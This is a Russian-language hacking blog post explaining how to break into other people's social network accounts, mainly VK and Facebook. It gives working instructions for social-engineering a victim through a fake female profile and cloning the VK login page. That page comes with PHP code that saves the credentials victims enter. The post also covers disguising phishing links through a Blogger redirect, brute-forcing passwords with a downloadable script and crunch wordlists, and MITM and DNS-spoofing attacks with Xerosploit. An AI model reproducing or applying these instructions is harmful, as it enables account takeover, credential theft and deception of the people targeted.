Life and Hacking
January 24, 2019

Ломаем аккаунты в любых соцсетях

Приветствую вас, дорогие друзья. Мы поговорим с вами о том, как можно войти в аккаунт практически любой соцсети. Я попытаюсь проанализировать все основные способы, которые имеются у нас в настоящий момент. Более того, одной лишь теорией я не ограничусь. Как мы знаем, теория без практики – ничего не значит. Всякое сказанное слово нужно подкреплять делом. Я попытаюсь найти доступ к определенным аккаунтам. Посмотрим, что у меня получится.

Основные способы взлома:

  • Собираем информационные данные

Далеко не все специалисты, занимающиеся вопросами такого рода, обращают внимание на данный пункт. И это ошибочный подход. Поскольку сила кроется именно в знании. Ваша задача – собрать как можно больше информации о профиле, который вы собираетесь взломать.

Прежде всего, нужно изучить страницу аккаунта. Принимая во внимание то, что «Вконтакте» в настоящий момент, вне всяких сомнений, является самой популярной социальной сетью на постсоветском пространстве, рассматривать будем именно эту платформу.

Изучите посты, которые закреплены. Обратите внимание на статус. Не лишним будет ознакомление с музыкальными пристрастиями «жертвы». Фото и видеозаписи также могут выступать в качестве источников важных данных. Следующий важный пункт – контактная информация. Не ограничивайтесь лишь беглым просмотром. Скопировать все это добро в ворд-документ можно всего за несколько секунд, не ленитесь. Не забывайте о месте проживания человека.

Начинаем диалог. Это один из столпов социальной инженерии. Создаем новый профиль. Как мне кажется, молодые люди чаще всего «клюют» на юных барышень с хорошими внешними данными. Именно поэтому я создал аккаунт девушки и наполнил его фотографиями и потратил время на раскрутку. В этом случае разоблачить меня будет сложнее.

СИ:

Пользователь начал полностью мне доверять уже через несколько дней. Мне удалось получить огромнейшее количество важных информационных данных. Я узнал его профессию, телефонный номер, дату рождения и т.п. Надеюсь, теперь вы понимаете, что не стоит рассказывать обо всех этих вещах первой встречной «девушке» из Интернета. Переходим к следующей стадии.

  • Выбираем технологию

В данном случае все будет зависеть от того, на чем строится ваше общение, как именно вы заставили человека себе доверять. В общем и целом, способ взлома не важен. Если одна технология даст сбой, всегда можно применить другую.

Допустим, я разузнал, что моя жертва обожает сериал «Во все тяжкие». В этом случае я могу сделать ставку на фишинг, отослав ему малварь. Предлог может быть следующим: «Ты посмотри! Я нашла серию, которую еще нигде не показывали из-за каких-то там запретов». Жертва скачивает файл и открывает его (правда, еще придется разобраться с форматом материала и обходом av), полагая, что все хорошо. Однако когда человек в следующий раз зайдет на свой профиль, я получу его данные.

Если у вас мало собранной информации, попробуйте подбор пароля. Поиграйте с именем, фамилией, годом рождения и т.п. Вам также помогут базы с наиболее часто встречающимися паролями.

Реализация задуманного:

Фишинг

Это самая распространенная технология. Впрочем, без внесения моих собственных корректировок здесь не обошлось. Создаем фишинговый сайт. Сразу замечу, что в наше время фишинг уже не столь эффективн, как раньше. Впрочем, понимание таких механизмов все равно не будет для вас лишним.

Идем на страницу авторизации --> пкм --> сохранить как --> test_fish. Мы получили папку и один файл.

Открываем test_fish с помощью текстового редактора.

<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" target="quick_login_frame">

Производим замену на:

<form method="POST" name="login" id="quick_login_form" action="./logs.php" target="quick_login_frame">

Теперь ищем строку 215 - 219 (JavaScript)

Над ней пишем

<!--

Потом ищем строку закрывающую тело тега script.

И после нее опять прописываем

-->

Тем самым мы закомментировали js код, который нам не нужен и может привести к лагам в работе. Сохраняем данный файл.

Создаем файл logs.php со следующим содержанием:

PHP:

<?php
     $login = $_POST['email'];
     $pass = $_POST['pass'];
     $file = fopen("my_pass.txt", 'at');
     fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
     fclose($file);
     echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>

Файл test_fish.html после ввода человеком данных отправляет их в logs.php. Затем произведется запись информации в файл my_pass.txt. Следующая стадия – человека перенаправляют в социальную сеть. При создании описываемого скрипта особое внимание следует уделить значению атрибута method. В рамках моей работы информация передается с использованием метода post. Значение атрибута name столь же важно. Если мы говорим о ВК, то здесь это будут e-mail и pass. Если вы увидите приблизительно такой код

<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>

То начало скрипта logs.php выглядело бы следующим образом:

<?php
    $login = $_GET['login'];
    $pass = $_GET['passwd'];[/SIZE]

[SIZE=4].....

Переходим к завершающей стадии нашей работы. Все сформированные нами файлы должны оказаться на хостинге.

Используйте ПО FileZilla (если сложные способы не для вас). Идеальным вариантом будет, если название веб-страницы будет сильно отличаться от названия соцсети. В противном случае хостинг может заблочить. Получаем следующее:

После ввода определенных данных у меня не остается сомнений – технология работоспособна.

  • Уделим внимание защищенности фишинга

Если человек получит от нас ссылку на fishing, то соцсеть ее забанит. Это происходит практически в 100% таких случаев. Если вы хотите обойти запрет, воспользуйтесь следующим методом (ну или любым другим, который удобнее для вас):

  • Регистрируем акк в blogger.com;
  • Создаем свой блог;
  • Применяем Шаблон --> Изменить html.
  • Сокращаем линк на fishing. Затем перед тегом <head> ставим следующий код:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>

Сохраняем.

И снова – социальная инженерия. Открываем ворд-документ с сохраненной нами ранее информацией. Пользователь, которого мы хотим взломать, получает от нас приблизительно следующее сообщение:

«Хай. Я тут наткнулась на очередной фан-сайт «Во все тяжкие». Кажется, здесь интересненько. Прикинь, им удалось достать эпизод, который ранее нигде не показывали. Лови ссылку: <Link>

Брутфорс

По своему опыту знаю, что в плане подбора паролей ВК безопаснее Фейсбука. Американский продукт все еще очень слаб в таких вопросах. Именно поэтому я создал профиль в этой социальной сети, оставив много информационных данных. Сейчас мы попытаемся сформировать базу паролей, а также применим давнишний скрипт для реализации brute force.

Итак, внешний вид моей страницы:

Ранее я уже говорил, что получаемую информацию лучше всего записывать. Не следует полагаться на свою память. Ведь вы можете упустить множество мелких деталей, которые могут иметь громадное значение. Первое что нам нужно – это имя и фамилия. Переходим к «угадыванию» профессии.

Порывшись в аккаунте, мне удалось найти даже телефонный номер. Выяснилось, что он действительно привязан к взламываемому профилю.

Переходим к бруту с применением скрипта faceboker.

https://mega.nz/#!hgUBhAYC!ZkqS0esOrEyrrrw0eKFiPuzqF1EYjAEHVVbAZJJ4R1c

Стандартный пароль "@deepside"

Производим распаковку и пишем:

chmod +x facebooker.pl
./facebooker <login> <wordlist>

Находим пароль в базе.

  • Формируем собственную базу

Если в самых популярных хранилищах такого рода нужной информации вы не нашли, то можно попробовать сформировать собственную базу. Воспользуйтесь crunch.

Например, я формирую базу на человека с именем Саня. Я допускаю, что наш Саня не такой осторожный и его пароль – это лишь имя и несколько цифр. Применю следующую команду:

crunch 10 10 -t sanya.%%%% >> baza.txt

Скорее всего, представленные цифры это какая-то дата. Продолжаем наше расследование. В то же самое время вы должны помнить о том, что формирование базы отнимает огромное количество времени и сил.

  • Проверяем номер

Как узнать, заходит ли жертва в аккаунт по номеру телефона, который у нас имеется? Возвращаемся к ВК. Используем мобильную версию. Нам нужна форма «Забыли пароль». Вводим номер, а также фамилию человека.

Если такой номер имеется, то он явно привязан к профилю.

MITM атака

Сразу же оговорюсь, что представленная технология не является эффективной на все сто процентов. В то же самое время в определенных случаях она приносит хорошие результаты.

Разберем анализируемую технологию чуть подробнее.

Представим, что у нас есть жертва, которую зовут Вася. Наверное, мне не нужно объяснять, что данные этого человека отправляются на маршрутизатор. В дело вступает искусство маскировки. Нам нужно превратиться именно в это устройство. Мы получим информацию, которую получает Васин роутер. Что касается самого маршрутизатора, то для него мы будем действовать от имени Васи.

А для этого нам понадобится MITM-фреймворк под названием Xerosploit. Нападения подобного рода в разы облегчаются благодаря ему.

Хорошо, произведем установку.

git clone https://github.com/LionSec/xerosploit
cd xerosploit
python install.py

Следом выбираете вашу ОС и установка завершена.

Проводим запуск:

xerosploit

Сканируем сеть:

scan

Можно увидеть, что данных он собрал довольно много. Настало время вписать локальный адрес жертвы. Затем выбираем следующее:

Сейчас попробую что-нибудь ввести с атакуемого устройства.

Все работает. Представленный фреймворк также пригодится и для другой технологии. Речь идет о следующем:

Осуществляем запуск apache с фишингом соц.сети. Можно использовать обычный html файл любых скриптов. Следующий шаг – открытие Xerosploit. Локальная страница становится доступной для жертвы. При этом одновременно осуществляется прослушка трафика.

Во время простой MITM-атаки, пользователь уже вошел в сеть. А поэтому овладеть данными будет сложнее. К тому же, велика вероятность получить не зашифрованную ssl информацию.

А этот способ поможет нам обойти эти барьеры.

  • Запуск Apache

Мы открыли терминал и пропишем:

service apache2 start

Потом отправляемся в каталог /var/www/html/. Именно сюда сохраняем страницу авторизации.

  • Фишинг

С помощью Xerosploit'а сканируем сеть и выбираем цель атаки. Потом:

dspoof --> run --> {имя вашего хоста}
  • Прослушка

Нам нужно сократить ссылку - http://{ваш локальный ip}/

Отправляем ее жертве. Но прежде в новой вкладке снова запускаем Xerosploit и уже проводим сниф.

Заключение

Сегодня изучили основные нюансы технологии фишинга. Провели создание фишинговой страницы. Затронули метод подбора паролей, успешно разобрали на практике. Также, мы поговорили о методе MITM. Комбинация разобранных технологий обязательно поможет вам взломать аккаунт нужного вам человека, а также выработать эффективную стратегию защиты собственных аккаунтов в социальных сетях.